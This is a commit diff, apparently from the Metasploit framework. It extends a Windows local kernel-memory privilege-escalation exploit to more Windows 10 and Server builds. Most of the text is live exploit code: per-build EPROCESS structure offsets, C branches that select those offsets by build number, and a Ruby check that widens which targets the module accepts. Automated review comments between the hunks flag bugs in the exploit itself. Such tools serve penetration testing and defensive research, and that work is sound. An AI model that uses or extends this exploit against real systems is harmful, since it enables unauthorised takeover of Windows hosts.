Add and test even more targets
parent
eb89550f85
commit
d990e884af
Binary file not shown.
|
@ -7,7 +7,9 @@ read and write kernel-mode memory.
|
|||
* Windows 7 SP0 x64
|
||||
* Windows 7 SP1 x64
|
||||
* Windows 8.1 x64
|
||||
* Windows 10 x64 v1803 - 20H2
|
||||
* Windows 10 x64 v1607 - v2009 (20H2)
|
||||
* Windows Server 2016 x64
|
||||
* Windows Server 2019 x64
|
||||
|
||||
## Verification Steps
|
||||
|
||||
|
|
|
@ -45,6 +45,15 @@ BOOL ResolveRequirements(void) {
|
|||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
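Review bot: The added branches match exact build numbers only (14393, 15063, 16299), while the Ruby check changed in this same commit accepts any Windows 10 build from 14393 to 19042. A build inside that range that has no branch here therefore depends entirely on how this chain ends, and the end of ResolveRequirements lies outside the hunk. Confirm that the final `else` returns FALSE without assigning `g_pEprocessOffsets`, because offsets from the wrong build applied to kernel memory would most likely crash the host. A comment above the chain such as `/* every build accepted by target_compatible? needs a branch here */` would help keep the two lists in step.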
|
||||
|
|
|
@ -43,6 +43,12 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp0 = { 0x188, 0x208, 0x180 };
|
|||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp1 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 8.1 (6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
||||
/* Windows 10 v1607 (10.0.14393) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1607%20Redstone%201%20(Anniversary%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
|
||||
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
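Review bot: The reference URL in the new v1709 comment is cut off, ending at `(Fall%20Creators%20Update */` without the closing `)/_EPROCESS` that the neighbouring comments carry, so the row `{ 0x2e8, 0x358, 0x2e0 }` cannot be checked from the link as written. Complete the URL, which presumably follows the same pattern as the other entries. The three initialiser values are also unlabelled in this hunk and the EPROCESS_OFFSETS definition is outside it. A one-line comment naming the fields in order would let a reader verify each row against the referenced structure layout.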
|
||||
|
|
|
@ -82,12 +82,13 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
def target_compatible?
|
||||
sysinfo_value = sysinfo['OS']
|
||||
|
||||
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
|
||||
build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
|
||||
vprint_status("Windows Build Number = #{build_num}")
|
||||
|
||||
return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
|
||||
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 17134 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
|
||||
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)
|
||||
|
||||
false
|
||||
end
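Review bot: The new `sysinfo_value.match(/Build (\d+)/)[1].to_i` raises NoMethodError when the OS string contains no "Build N" token, because `match` returns nil and `[1]` is then called on it. The compatibility check would abort with an exception instead of returning false. Using `build_num = sysinfo_value[/Build (\d+)/, 1].to_i` yields 0 in that case, which fails every comparison below and reaches the final `false`. Separately, the documentation in this commit lists Windows Server 2019, but only `/Windows 2016/` is tested here. If that pattern is meant to cover 2019 as well, a comment saying so would help.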
|
||||
|
|